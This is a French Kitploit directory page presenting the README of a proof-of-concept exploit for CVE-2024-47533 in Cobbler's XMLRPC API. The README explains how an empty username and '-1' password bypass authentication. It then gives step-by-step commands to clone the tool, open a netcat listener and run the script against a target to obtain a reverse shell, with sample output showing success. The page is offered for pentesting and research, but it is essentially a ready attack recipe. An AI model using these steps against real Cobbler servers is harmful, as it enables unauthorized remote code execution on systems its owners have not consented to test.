Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-47533-PoC — Exploit de preuve de concept pour CVE-2024-47533, un contournement d'authentification non authentifié dans l'API XMLRPC de Cobbler conduisant à une exécution de code à distance via un shell inverse injecté. | Kitploit
Outils/GitHubGitHub/00xcanelo/cve-2024-47533-poc
Authentification et AutorisationExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHub00xcanelo/cve-2024-47533-poc

CVE-2024-47533-PoC

Exploit de preuve de concept pour CVE-2024-47533, un contournement d'authentification non authentifié dans l'API XMLRPC de Cobbler conduisant à une exécution de code à distance via un shell inverse injecté.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
13il y a 1 anPas encore vérifié

CVE-2024-47533 – Contournement d'authentification XMLRPC Cobbler → Reverse Shell (RCE non authentifiée)

📌 Résumé

Ce dépôt contient une preuve de concept (PoC) d'exploit pour CVE-2024-47533,
un contournement critique de l'authentification dans l'API XMLRPC de Cobbler qui conduit à une exécution de code à distance non authentifiée (RCE).

L'exploit exploite la faille de la méthode login() de l'API XMLRPC pour contourner l'authentification et injecter une commande de reverse shell via background_import().


⚠️ Avertissement

Cet outil est destiné uniquement à des fins éducatives, de recherche et de tests de pénétration autorisés.
Ne l'utilisez PAS sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation écrite explicite.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages.


🛠 Détails techniques

  • Type de vulnérabilité : Contournement d'authentification → RCE
  • Composant affecté : API XMLRPC Cobbler
  • Vecteur d'attaque : Réseau
  • Privilèges requis : Aucun
  • Interaction utilisateur : Aucune

Cause racine :
utils.get_shared_secret() retourne incorrectement -1 en raison d'une mauvaise gestion des lectures de fichiers en mode binaire avec un encodage, permettant l'authentification avec un nom d'utilisateur vide et -1 comme mot de passe.

Impact :
Un attaquant peut :

  • Obtenir un accès API de niveau admin
  • Injecter des commandes système arbitraires dans les modèles Cobbler
  • Lancer un reverse shell sur la cible

🚀 Utilisation

1️⃣ Cloner le dépôt

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC

2️⃣ Configurer un écouteur

Sur votre machine d'attaque :

root@kitploit:~
nc -lvnp 4444

3️⃣ Exécuter l'exploit

root@kitploit:~
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>

Exemple :

root@kitploit:~
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444

📂 Structure du fichier

root@kitploit:~
.
├── CVE-2024-47533.py  # Reverse shell exploit script
└── README.md          # Documentation

📸 Exemple de sortie

root@kitploit:~
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.

🧑‍💻 Auteur

00xCanelo
Profil GitHub


📚 Références

  • NVD : CVE-2024-47533
  • Projet Cobbler GitHub
Télécharger l’outil